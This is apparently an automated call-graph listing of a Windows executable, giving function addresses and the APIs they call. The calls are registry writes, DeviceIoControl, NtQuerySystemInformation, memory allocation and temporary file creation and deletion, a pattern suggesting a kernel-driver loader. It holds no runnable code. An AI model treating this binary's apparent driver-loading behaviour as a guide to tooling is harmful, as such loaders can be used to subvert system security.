7ff7738e4967 rand 5477->5482 5480 7ff7738ea3c0 9 API calls 5478->5480 5479->5461 5493 7ff7738e49b0 5480->5493 5486 7ff7738e4fd9 5481->5486 5487 7ff7738e4fd4 5481->5487 5490 7ff7738e4fcd _invalid_parameter_noinfo_noreturn 5481->5490 5482->5478 5482->5482 5483->5485 5484->5474 5489 7ff7738f3fe0 free 5485->5489 5488 7ff7738f3fc0 8 API calls 5486->5488 5491 7ff7738f3fe0 free 5487->5491 5492 7ff7738e4feb 5488->5492 5489->5481 5490->5487 5491->5486 5492->5313 5492->5314 5494 7ff7738ed590 9 API calls 5493->5494 5495 7ff7738e49d7 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5494->5495 5496 7ff7738e49f3 5495->5496 5497 7ff7738e4a2d 5495->5497 5498 7ff7738e4a28 5496->5498 5499 7ff7738e4a21 _invalid_parameter_noinfo_noreturn 5496->5499 5501 7ff7738e4a66 _wremove memset 5497->5501 5502 7ff7738e4a3e 5497->5502 5500 7ff7738f3fe0 free 5498->5500 5499->5498 5500->5497 5885 7ff7738e89c0 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 5501->5885 5504 7ff7738ea3c0 9 API calls 5502->5504 5506 7ff7738e4a51 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5504->5506 5510 7ff7738e4e7e 5506->5510 5507 7ff7738e4b23 5509 7ff7738e9ef0 12 API calls 5507->5509 5508 7ff7738e4ade 5511 7ff7738e9ef0 12 API calls 5508->5511 5512 7ff7738e4b28 5509->5512 5510->5467 5516 7ff7738e4ebc 5510->5516 5520 7ff7738e4eb5 _invalid_parameter_noinfo_noreturn 5510->5520 5513 7ff7738e4ae3 5511->5513 5514 7ff7738e4b50 5512->5514 5515 7ff7738e4b2d ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N 5512->5515 5517 7ff7738e4b0b 5513->5517 5518 7ff7738e4ae8 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N 5513->5518 5519 7ff7738e4000 15 API calls 5514->5519 5515->5514 5522 7ff7738f3fe0 free 5516->5522 5890 7ff7738e4000 5517->5890 5518->5517 5523 7ff7738e4b5c 5519->5523 5520->5516 5522->5467 5894 7ff7738f2900 5523->5894 5526 7ff7738e4ba5 CreateFileW 5529 7ff7738e4bdf 5526->5529 5530 7ff7738e4beb 5526->5530 5527 7ff7738e4b69 5528 7ff7738ea3c0 9 API calls 5527->5528 5531 7ff7738e4b7c ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z _wremove 5528->5531 5534 7ff7738ea3c0 9 API calls 5529->5534 5532 7ff7738ec9f0 7 API calls 5530->5532 5531->5510 5533 7ff7738e4c13 5532->5533 5944 7ff7738f32c0 NtQuerySystemInformation 5533->5944 5536 7ff7738e4e65 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5534->5536 5538 7ff7738e4d0b 5536->5538 5540 7ff7738e5a80 94 API calls 5538->5540 5539 7ff7738e4c65 5539->5529 5545 7ff7738ec9f0 7 API calls 5539->5545 5542 7ff7738e4e4d 5540->5542 5541 7ff7738e4c60 5544 7ff7738f3fe0 free 5541->5544 5542->5510 5543 7ff7738e4c59 _invalid_parameter_noinfo_noreturn 5543->5541 5544->5539 5546 7ff7738e4ca5 5545->5546 5547 7ff7738f32c0 25 API calls 5546->5547 5548 7ff7738e4cb0 5547->5548 5549 7ff7738e4cf3 5548->5549 5550 7ff7738e4cee 5548->5550 5553 7ff7738e4ce7 _invalid_parameter_noinfo_noreturn 5548->5553 5551 7ff7738e4d10 5549->5551 5552 7ff7738e4cf8 5549->5552 5554 7ff7738f3fe0 free 5550->5554 5982 7ff7738e7b00 5551->5982 5964 7ff7738ea7c0 5552->5964 5553->5550 5554->5549 5557 7ff7738e4d60 DeviceIoControl 5557->5529 5558 7ff7738e4d34 5557->5558 5558->5529 5558->5557 5559 7ff7738e4dd8 5558->5559 5559->5542 5998 7ff7738e72b0 5559->5998 5566 7ff7738e4e2f 6226 7ff7738e5010 5566->6226 5569 7ff7738ea7c0 29 API calls 5570 7ff7738e4e4b 5569->5570 5570->5536 6600 7ff7738f14c0 GetCurrentProcessId CreateToolhelp32Snapshot 5571->6600 5573 7ff7738f15c4 5574 7ff7738f161d 5573->5574 5575 7ff7738ea3c0 9 API calls 5573->5575 5576 7ff7738f3fc0 8 API calls 5574->5576 5577 7ff7738f15dd ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5575->5577 5578 7ff7738f162a 5576->5578 5579 7ff7738ea3c0 9 API calls 5577->5579 5578->5325 5580 7ff7738f1600 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z ?get@?$basic_istream@DU?$char_traits@D@std@@@std@ 5579->5580 5580->5574 5583 7ff7738f13b0 5581->5583 5582 7ff7738f1466 5582->5253 5583->5582 5583->5583 5584 7ff7738f13ff _wcsicmp 5583->5584 5585 7ff7738f1436 _wcsicmp 5583->5585 5584->5583 5585->5583 5589 7ff7738ea3f0 ?good@ios_base@std@ 5586->5589 5588 7ff7738ea444 5590 7ff7738ea45a ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12 ?good@ios_base@std@ 5588->5590 5598 7ff7738ea472 5588->5598 5589->5588 5589->5598 5590->5598 5592 7ff7738ea4cf ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J 5593 7ff7738ea4ec 5592->5593 5594 7ff7738ea47c ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N ?uncaught_exception@std@ 5592->5594 5593->5594 5599 7ff7738ea4f5 ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W 5593->5599 5595 7ff7738ea55e ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@ 5594->5595 5596 7ff7738ea568 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5594->5596 5595->5596 5596->5251 5597 7ff7738ea4a6 ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W 5597->5594 5597->5598 5598->5592 5598->5594 5598->5597 5599->5593 5599->5594 5601 7ff7738ed5cc ?good@ios_base@std@ 5600->5601 5603 7ff7738ed605 5601->5603 5612 7ff7738ed633 5601->5612 5604 7ff7738ed61b ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12 ?good@ios_base@std@ 5603->5604 5603->5612 5604->5612 5606 7ff7738ed694 ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J 5608 7ff7738ed684 5606->5608 5609 7ff7738ed63d ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N ?uncaught_exception@std@ 5606->5609 5607 7ff7738ed667 ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W 5607->5608 5607->5612 5608->5609 5613 7ff7738ed6b6 ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W 5608->5613 5610 7ff7738ed71f ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@ 5609->5610 5611 7ff7738ed729 5609->5611 5610->5611 5611->5315 5612->5606 5612->5607 5612->5609 5613->5608 5613->5609 5615 7ff7738f30d0 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 5614->5615 5616 7ff7738f30cd 5614->5616 5617 7ff7738e9fb0 24 API calls 5615->5617 5616->5615 5618 7ff7738f317e 5617->5618 5619 7ff7738f3183 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N 5618->5619 5620 7ff7738f31a2 ??7ios_base@std@ 5618->5620 5619->5620 5621 7ff7738f31e5 5620->5621 5631 7ff7738f31de 5620->5631 6609 7ff7738f34f0 5621->6609 5623 7ff7738e1e20 15 API calls 5625 7ff7738f328c 5623->5625 5624 7ff7738f3253 5626 7ff7738e9ef0 12 API calls 5624->5626 5627 7ff7738f3fc0 8 API calls 5625->5627 5628 7ff7738f325d 5626->5628 5629 7ff7738f1fe7 5627->5629 5630 7ff7738f3262 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N 5628->5630 5628->5631 5629->5326 5629->5327 5630->5631 5631->5623 5633 7ff7738ee075 5632->5633 5708 7ff7738ee093 5632->5708 5634 7ff7738ee09f VirtualAlloc 5633->5634 5633->5708 5636 7ff7738ee613 5634->5636 5637 7ff7738ee0c2 5634->5637 5635 7ff7738ea3c0 9 API calls 5638 7ff7738ee603 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5635->5638 5642 7ff7738f3fc0 8 API calls 5636->5642 5639 7ff7738ee0e4 5637->5639 5640 7ff7738ee100 5637->5640 5638->5636 6643 7ff7738ed8f0 5639->6643 5643 7ff7738ee105 5640->5643 5644 7ff7738ee118 5640->5644 5645 7ff7738ee621 5642->5645 6717 7ff7738ede00 5643->6717 5647 7ff7738ee20e 5644->5647 5649 7ff7738ee1e1 5644->5649 5654 7ff7738f4090 3 API calls 5644->5654 5645->5342 5645->5343 5648 7ff7738ea3c0 9 API calls 5647->5648 5650 7ff7738ee221 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z VirtualFree 5648->5650 5652 7ff7738ee1eb 5649->5652 5653 7ff7738ee247 5649->5653 5650->5636 5651 7ff7738ee26a 5658 7ff7738ea3c0 9 API calls 5651->5658 5655 7ff7738ea3c0 9 API calls 5652->5655 6753 7ff7738ebd20 5653->6753 5656 7ff7738ee14c 5654->5656 5659 7ff7738ee1fe ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5655->5659 5656->5649 5662 7ff7738ec9f0 7 API calls 5656->5662 5661 7ff7738ee27d ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@PEBX ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z memmove 5658->5661 5659->5647 5660 7ff7738ee0f0 5660->5647 5660->5651 5663 7ff7738ee2eb 5661->5663 5664 7ff7738ee2b8 5661->5664 5665 7ff7738ee17e 5662->5665 5666 7ff7738ea3c0 9 API calls 5663->5666 5664->5663 5669 7ff7738ee2c9 memmove 5664->5669 5667 7ff7738e6440 27 API calls 5665->5667 5668 7ff7738ee310 ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@K 5666->5668 5670 7ff7738ee18f 5667->5670 5671 7ff7738ea3c0 9 API calls 5668->5671 5669->5664 5672 7ff7738ee1d4 5670->5672 5674 7ff7738ee1cf 5670->5674 5677 7ff7738ee1c8 _invalid_parameter_noinfo_noreturn 5670->5677 5673 7ff7738ee33b ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5671->5673 6752 7ff7738f4024 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 5672->6752 6769 7ff7738ef330 5673->6769 5679 7ff7738f3fe0 free 5674->5679 5677->5674 5679->5672 5683 7ff7738ee375 5683->5708 6798 7ff7738ef480 5683->6798 5688 7ff7738e5ef0 9 API calls 5689 7ff7738ee3b8 5688->5689 5691 7ff7738ee39d 5689->5691 5693 7ff7738ea3c0 9 API calls 5689->5693 5690 7ff7738ea3c0 9 API calls 5692 7ff7738ee462 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z VirtualFree 5690->5692 5691->5690 5694 7ff7738ea3c0 9 API calls 5692->5694 5695 7ff7738ee3e1 ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@PEBX ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5693->5695 5696 7ff7738ee496 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5694->5696 6852 7ff7738f1490 5695->6852 5698 7ff7738ee4b1 5696->5698 5699 7ff7738ee4ec 5696->5699 6871 7ff7738e60d0 5698->6871 5701 7ff7738ee4f1 5699->5701 5711 7ff7738ee4c5 5699->5711 5700 7ff7738ee415 5700->5691 6855 7ff7738eec90 5700->6855 6911 7ff7738e5fe0 5701->6911 5703 7ff7738e6320 50 API calls 5703->5708 5705 7ff7738ee4b9 5705->5708 6891 7ff7738e6200 5705->6891 5708->5635 5710 7ff7738ee4fc 5712 7ff7738ea3c0 9 API calls 5710->5712 5711->5703 5711->5708 5713 7ff7738ee51d ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@J ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5712->5713 5714 7ff7738ee54e 5713->5714 5715 7ff7738ee5ca VirtualFree 5713->5715 5716 7ff7738ea3c0 9 API calls 5714->5716 5715->5636 5717 7ff7738ee561 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5716->5717 5718 7ff7738ee5e0 5717->5718 5719 7ff7738ee57c 5717->5719 5721 7ff7738ee5e5 5718->5721 5722 7ff7738ee590 5718->5722 5720 7ff7738e60d0 50 API calls 5719->5720 5724 7ff7738ee584 5720->5724 5723 7ff7738e5fe0 34 API calls 5721->5723 5725 7ff7738e6320 50 API calls 5722->5725 5726 7ff7738ee59c 5722->5726 5723->5726 5724->5726 5727 7ff7738e6200 50 API calls 5724->5727 5725->5726 5728 7ff7738ea3c0 9 API calls 5726->5728 5727->5722 5729 7ff7738ee5ba ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5728->5729 5729->5715 5731 7ff7738ea3c0 9 API calls 5730->5731 5732 7ff7738e5ac6 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5731->5732 5733 7ff7738e5ae0 CloseHandle 5732->5733 5734 7ff7738e5ae9 5732->5734 5733->5734 5735 7ff7738e5af6 CloseHandle 5734->5735 5736 7ff7738e5b07 5734->5736 5735->5736 7252 7ff7738f2dc0 GetModuleHandleA 5736->7252 5739 7ff7738e5b62 5740 7ff7738e5b66 5739->5740 5744 7ff7738e5b77 memset 5739->5744 5745 7ff7738f3fc0 8 API calls 5740->5745 5741 7ff7738e5b5d 5742 7ff7738f3fe0 free 5741->5742 5742->5739 5743 7ff7738e5b56 _invalid_parameter_noinfo_noreturn 5743->5741 5746 7ff7738e89c0 29 API calls 5744->5746 5747 7ff7738e5de4 5745->5747 5748 7ff7738e5ba5 5746->5748 5747->5347 5749 7ff7738e5bd0 rand rand 5748->5749 5750 7ff7738ea3c0 9 API calls 5748->5750 5751 7ff7738e5c1c 5749->5751 5752 7ff7738e5bc0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5750->5752 5753 7ff7738e5c26 rand 5751->5753 5754 7ff7738e5c59 ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEBD_J ??7ios_base@std@ 5751->5754 5752->5749 5753->5753 5753->5754 5755 7ff7738e5c8c 5754->5755 5756 7ff7738ea3c0 9 API calls 5755->5756 5757 7ff7738e5c98 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5756->5757 5758 7ff7738e9ef0 12 API calls 5757->5758 5759 7ff7738e5cb2 5758->5759 5760 7ff7738e5cd5 5759->5760 5761 7ff7738e5cb7 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N 5759->5761 5762 7ff7738f3fe0 free 5760->5762 5761->5760 5763 7ff7738e5cdd _wremove 5762->5763 5764 7ff7738e5d35 5763->5764 5765 7ff7738e5d6c ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 5764->5765 5767 7ff7738e9ef0 12 API calls 5764->5767 5765->5740 5766 7ff7738e5d98 5765->5766 5768 7ff7738e5dcd 5766->5768 5769 7ff7738e5dc6 _invalid_parameter_noinfo_noreturn 5766->5769 5767->5765 5770 7ff7738f3fe0 free 5768->5770 5769->5768 5770->5740 7285 7ff7738e9ab0 5771->7285 5776 7ff7738f1346 5778 7ff7738ea3c0 9 API calls 5776->5778 5777 7ff7738f12ee 5777->5776 5779 7ff7738f12f4 5777->5779 5781 7ff7738f1359 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5778->5781 5780 7ff7738ea3c0 9 API calls 5779->5780 5782 7ff7738f1307 ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@PEBX 5780->5782 5783 7ff7738f1375 5781->5783 5784 7ff7738f137a 5781->5784 5785 7ff7738ea3c0 9 API calls 5782->5785 5786 7ff7738e5a80 94 API calls 5783->5786 5787 7ff7738f1326 ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@K 5785->5787 5786->5784 5787->5781 5789 7ff7738f39ee WideCharToMultiByte 5788->5789 5790 7ff7738f3997 5788->5790 5792 7ff7738f3a1f 5789->5792 5790->5789 5791 7ff7738f399f WideCharToMultiByte 5790->5791 5791->5792 5793 7ff7738f2345 5791->5793 5794 7ff7738f3a23 GetLastError 5792->5794 5795 7ff7738f3a2b 5792->5795 5793->5377 5793->5379 5793->5380 5793->5384 5794->5795 5795->5793 5796 7ff7738f3a38 WideCharToMultiByte 5795->5796 5796->5793 5797 7ff7738f3a65 GetLastError 5796->5797 5797->5793 5799 7ff7738f279d 5798->5799 5800 7ff7738f28ea 5798->5800 5802 7ff7738f27fd 5799->5802 5804 7ff7738f27f0 5799->5804 5805 7ff7738f2829 5799->5805 5826 7ff7738e1230 ?_Xlength_error@std@@YAXPEBD 5800->5826 5806 7ff7738f4108 std::_Facet_Register 3 API calls 5802->5806 5803 7ff7738f28ef 5807 7ff7738e1190 Concurrency::cancel_current_task __std_exception_copy 5803->5807 5804->5802 5804->5803 5809 7ff7738f2812 5805->5809 5810 7ff7738f4108 std::_Facet_Register 3 API calls 5805->5810 5806->5809 5811 7ff7738f28f5 5807->5811 5808 7ff7738f28a5 _invalid_parameter_noinfo_noreturn 5812 7ff7738f28ac memmove memset 5808->5812 5809->5808 5809->5812 5813 7ff7738f2859 memmove memset 5809->5813 5810->5809 5814 7ff7738f28a3 5812->5814 5815 7ff7738f2883 5813->5815 5816 7ff7738f2898 5813->5816 5814->5384 5815->5808 5815->5816 5817 7ff7738f3fe0 free 5816->5817 5817->5814 5819 7ff7738f0890 5818->5819 5827 7ff7738f04c0 5819->5827 5823 7ff7738f05be 5822->5823 5824 7ff7738f04c0 11 API calls 5823->5824 5825 7ff7738f05d5 _CxxThrowException __std_exception_copy 5824->5825 5825->5377 5828 7ff7738f04f6 __std_exception_copy 5827->5828 5829 7ff7738f0545 5828->5829 5830 7ff7738f057a 5828->5830 5832 7ff7738f0575 5829->5832 5835 7ff7738f056e _invalid_parameter_noinfo_noreturn 5829->5835 5831 7ff7738f3fc0 8 API calls 5830->5831 5834 7ff7738f059b _CxxThrowException 5831->5834 5833 7ff7738f3fe0 free 5832->5833 5833->5830 5835->5832 5838 7ff7738f3ce0 5837->5838 5839 7ff7738f3eca GetLastError 5837->5839 5838->5417 5838->5418 5839->5838 5841 7ff7738ea152 5840->5841 5844 7ff7738ea113 memmove 5840->5844 5842 7ff7738ecea0 10 API calls 5841->5842 5845 7ff7738ea165 5842->5845 5844->5449 5845->5449 5847 7ff7738e9b1e 5846->5847 5848 7ff7738e9bf9 5847->5848 5853 7ff7738e9b34 5847->5853 6316 7ff7738e1230 ?_Xlength_error@std@@YAXPEBD 5848->6316 5849 7ff7738e9b42 5849->5457 5851 7ff7738e9bfe 5854 7ff7738e1190 Concurrency::cancel_current_task __std_exception_copy 5851->5854 5852 7ff7738e9b6a 5855 7ff7738f4108 std::_Facet_Register 3 API calls 5852->5855 5853->5849 5853->5851 5853->5852 5857 7ff7738e9bc4 5853->5857 5858 7ff7738e9c04 5854->5858 5859 7ff7738e9b80 5855->5859 5856 7ff7738e9bce memmove 5856->5457 5857->5856 5860 7ff7738f4108 std::_Facet_Register 3 API calls 5857->5860 5861 7ff7738e4000 15 API calls 5858->5861 5862 7ff7738e9bbd _invalid_parameter_noinfo_noreturn 5859->5862 5863 7ff7738e9b88 5859->5863 5860->5856 5864 7ff7738e9c2b 5861->5864 5862->5857 5863->5856 5865 7ff7738e9c3d 5864->5865 5866 7ff7738f3fe0 free 5864->5866 5865->5457 5866->5865 5868 7ff7738e9af0 22 API calls 5867->5868 5869 7ff7738e3d1d 5868->5869 5870 7ff7738e3d3c GetFileAttributesExA 5869->5870 5877 7ff7738e3e27 5869->5877 5871 7ff7738e3d88 CreateFileA 5870->5871 5870->5877 5872 7ff7738e3dd3 GetCurrentProcessId OpenProcess 5871->5872 5871->5877 5875 7ff7738e3df1 SymInitialize 5872->5875 5876 7ff7738e3e1e CloseHandle 5872->5876 5873 7ff7738e3efe 5874 7ff7738f3fc0 8 API calls 5873->5874 5880 7ff7738e3f11 5874->5880 5881 7ff7738e3e15 CloseHandle 5875->5881 5882 7ff7738e3e8f SymSetOptions SymLoadModuleEx 5875->5882 5876->5877 5877->5873 5878 7ff7738e3ef9 5877->5878 5883 7ff7738e3e88 _invalid_parameter_noinfo_noreturn 5877->5883 5879 7ff7738f3fe0 free 5878->5879 5879->5873 5880->5460 5880->5479 5881->5876 5882->5877 5884 7ff7738e3ed8 SymCleanup 5882->5884 5883->5882 5884->5881 6317 7ff7738e9fb0 5885->6317 5888 7ff7738e4aa8 ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEBD_J ??7ios_base@std@ 5888->5507 5888->5508 5889 7ff7738e8a99 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N 5889->5888 5891 7ff7738e4056 5890->5891 5892 7ff7738e4093 ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 5891->5892 5893 7ff7738e9ef0 12 API calls 5891->5893 5893->5892 5895 7ff7738f2937 5894->5895 5927 7ff7738f2dac 5895->5927 6326 7ff7738ed270 5895->6326 5898 7ff7738f2db2 6341 7ff7738e1230 ?_Xlength_error@std@@YAXPEBD 5898->6341 5899 7ff7738f2987 5899->5898 5901 7ff7738ed270 6 API calls 5899->5901 5903 7ff7738f29c9 RegCreateKeyW 5901->5903 5904 7ff7738f29f6 RegSetKeyValueW 5903->5904 5912 7ff7738f29ed 5903->5912 5905 7ff7738f2a33 RegCloseKey 5904->5905 5906 7ff7738f2aa8 RegSetKeyValueW 5904->5906 5905->5912 5908 7ff7738f2aeb RegCloseKey GetModuleHandleA 5906->5908 5909 7ff7738f2ad9 RegCloseKey 5906->5909 5907 7ff7738ea7c0 29 API calls 5911 7ff7738f2a4c ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5907->5911 5910 7ff7738f2b0a GetProcAddress GetProcAddress 5908->5910 5939 7ff7738f2a5c 5908->5939 5909->5912 5910->5912 5911->5939 5912->5907 5917 7ff7738f2da7 5912->5917 5924 7ff7738ed270 6 API calls 5912->5924 5913 7ff7738f2cd6 5914 7ff7738f2d2b 5913->5914 5916 7ff7738f2d26 5913->5916 5922 7ff7738f2d1f _invalid_parameter_noinfo_noreturn 5913->5922 5918 7ff7738f2d80 5914->5918 5925 7ff7738f2d7b 5914->5925 5929 7ff7738f2d74 _invalid_parameter_noinfo_noreturn 5914->5929 5915 7ff7738f2cd1 5920 7ff7738f3fe0 free 5915->5920 5923 7ff7738f3fe0 free 5916->5923 6339 7ff7738e1230 ?_Xlength_error@std@@YAXPEBD 5917->6339 5926 7ff7738f3fc0 8 API calls 5918->5926 5919 7ff7738f2aa1 _invalid_parameter_noinfo_noreturn 5919->5906 5920->5913 5922->5916 5923->5914 5928 7ff7738f2b91 RtlInitUnicodeString 5924->5928 5930 7ff7738f3fe0 free 5925->5930 5931 7ff7738e4b65 5926->5931 6340 7ff7738e1230 ?_Xlength_error@std@@YAXPEBD 5927->6340 5932 7ff7738f2bb0 5928->5932 5929->5925 5930->5918 5931->5526 5931->5527 5933 7ff7738ea7c0 29 API calls 5932->5933 5934 7ff7738f2bc5 ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@J ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5933->5934 5934->5939 5935 7ff7738ea7c0 29 API calls 5936 7ff7738f2c0f ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5935->5936 5937 7ff7738ea7c0 29 API calls 5936->5937 5938 7ff7738f2c32 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5937->5938 5940 7ff7738ea7c0 29 API calls 5938->5940 5939->5913 5939->5915 5939->5919 5939->5935 5941 7ff7738f2ca2 _invalid_parameter_noinfo_noreturn 5939->5941 5942 7ff7738f3fe0 free 5939->5942 5943 7ff7738f2c55 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5940->5943 5941->5939 5942->5939 5943->5939 5945 7ff7738f3300 5944->5945 5946 7ff7738f334e 5944->5946 5947 7ff7738f3305 VirtualFree 5945->5947 5948 7ff7738f3316 VirtualAlloc NtQuerySystemInformation 5945->5948 5949 7ff7738f3352 5946->5949 5958 7ff7738f336f 5946->5958 5947->5948 5948->5945 5948->5946 5950 7ff7738f3357 VirtualFree 5949->5950 5952 7ff7738f3374 5949->5952 5950->5952 5951 7ff7738f3452 VirtualFree 5951->5952 5953 7ff7738f3fc0 8 API calls 5952->5953 5954 7ff7738e4c1e 5953->5954 5954->5539 5954->5541 5954->5543 5955 7ff7738ec9f0 7 API calls 5955->5958 5956 7ff7738f33f0 _stricmp 5957 7ff7738f3488 VirtualFree 5956->5957 5956->5958 5957->5952 5959 7ff7738f34a8 5957->5959 5958->5951 5958->5952 5958->5955 5958->5956 5961 7ff7738f34d1 _invalid_parameter_noinfo_noreturn 5958->5961 5962 7ff7738f3fe0 free 5958->5962 5960 7ff7738f34d8 5959->5960 5959->5961 5963 7ff7738f3fe0 free 5960->5963 5961->5960 5962->5958 5963->5952 5968 7ff7738ea7f0 ?good@ios_base@std@ 5964->5968 5966 7ff7738ea871 5969 7ff7738ea885 ?getloc@ios_base@std@@QEBA?AVlocale@2 5966->5969 5970 7ff7738ea87b ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N ?uncaught_exception@std@ 5966->5970 5967 7ff7738ea843 5967->5966 5971 7ff7738ea859 ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12 ?good@ios_base@std@ 5967->5971 5968->5966 5968->5967 6342 7ff7738ecaf0 ??0_Lockit@std@@QEAA@H ??Bid@locale@std@ 5969->6342 5974 7ff7738ea9f7 ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@ 5970->5974 5977 7ff7738eaa01 5970->5977 5971->5966 5974->5977 5975 7ff7738ea912 5975->5970 5979 7ff7738ea980 5975->5979 5980 7ff7738ea930 ?widen@?$ctype@_W@std@@QEBA_WD ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W 5975->5980 5976 7ff7738ea8a3 5976->5975 5978 7ff7738ea8f5 ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W 5976->5978 5977->5538 5978->5975 5978->5976 5979->5970 5981 7ff7738ea985 